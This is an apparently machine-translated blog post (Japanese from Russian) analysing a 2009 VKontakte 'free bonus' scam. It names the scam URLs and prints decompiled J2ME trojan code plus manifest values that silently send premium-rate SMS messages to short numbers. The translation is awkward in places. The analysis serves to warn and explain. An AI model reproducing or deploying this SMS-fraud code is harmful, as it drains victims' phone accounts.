次は消えた同じテキストで、困惑してbainkiに行きます:
VKontakteスパムについてのこのトピックのPPSで書かれていたように(偶然にも偽物でした )、「投稿を書いている間、ウイルスはアカウントから600ルーブルを削除するという情報を受け取っていました。」
「SMSを短い番号に送信して600を無料にする」などの「未確認情報」に非常によく似ているため、このような「未確認情報」には常に驚かされました。 それでは、切望されている現金ボーナスを無料で手に入れたい貧しい仲間に何が起こるかを考えてみましょう。
もちろん、彼の行動を繰り返しますが、それらを正確に繰り返すことはしません。
1.トピックで言及されているURL http://vkpresents.ru/に移動し、[ログイン]ボタンをクリックします。 はい、確かに、「現時点でのボーナスは500ルーブルです!」
2.ボーナスを取得するには、 http://bonus.vkpresents.ru/yes/go.php?id = 1で jarをダウンロードする必要があります。 ダウンロード。
3.最も興味深いのは、この神秘的なジャーが何をするかです。 まず、開梱しましょう:すぐに満足します -ico.pngファイル、META-INFディレクトリ(jarの標準)およびHotSex.classファイル(!)
実際、このホットファイルにはすべての魔法も含まれています。 ご存じのとおり、 Javaプログラムは仮想Javaマシンによって実行されるバイトコードに変換されるため、このバイトコードは元のJavaコードを逆コンパイルして復元するのが非常に簡単です。 jadやjd-guiなどのJavaデコンパイラーを使用します。
だから、ここに無料のチーズが実際にどのように見えるかがあります:
public void startApp() {
String number;
MessageConnection messageconnection;
TextMessage textmessage;
for (int i = 0; i < 3; ) {
try {
number = "sms://1171";
if (i == 0)
number = "sms://" + getAppProperty("a");
if (i == 1)
number = "sms://" + getAppProperty("b");
if (i == 2)
number = "sms://" + getAppProperty("e");
messageconnection = (MessageConnection)Connector.open(number);
textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("kis"));
messageconnection.send(textmessage);
}
catch (Exception exception)
{
}
++i;
}
...
明らかに、このコードは異なる番号にsmsを送信しようと数回試行します。デフォルトは1171です。getAppProperty()を使用してコードにアクセスするMETA-INF / MANIFEST.MFにある他のものを見てみましょう。
kis: fasax 1340
wix: xasex 1340
a: 1171
b: 1161
c: 9099
d: 9099
e: 1161
これは、悪意のあるプログラムがSMSを送信しようとしているまさにその数です:) Googleの番号1171へのSMSリクエストの最初の結果は、無料のSMSを送信しようとする詐欺師の議論へのリンクを提供します。 したがって、SMSを送信しようとする試みはコード8のみで行われ、各SMS 5 cuが削除されると考える場合。 -最後に、すべてのSMSが送信に成功した場合、アカウントから引き落とされる40ドルというかなり印象的な金額を受け取ります。 正確な量については、幸いなことに、私は知りませんが、言及された600ルーブルはおそらく平均値です:)
要約すると。 配線はもちろん非常に弱く、少なくとも一人がそのように振る舞うことはないと思います、そして実際、2009年は庭にいます、それはもっと独創的なものを思い付く時です:)それにもかかわらず、クラスHotSex.classの名前は明らかにこのjar -kaは、無料でポルノを視聴することが提案されている別の配線から取られました:)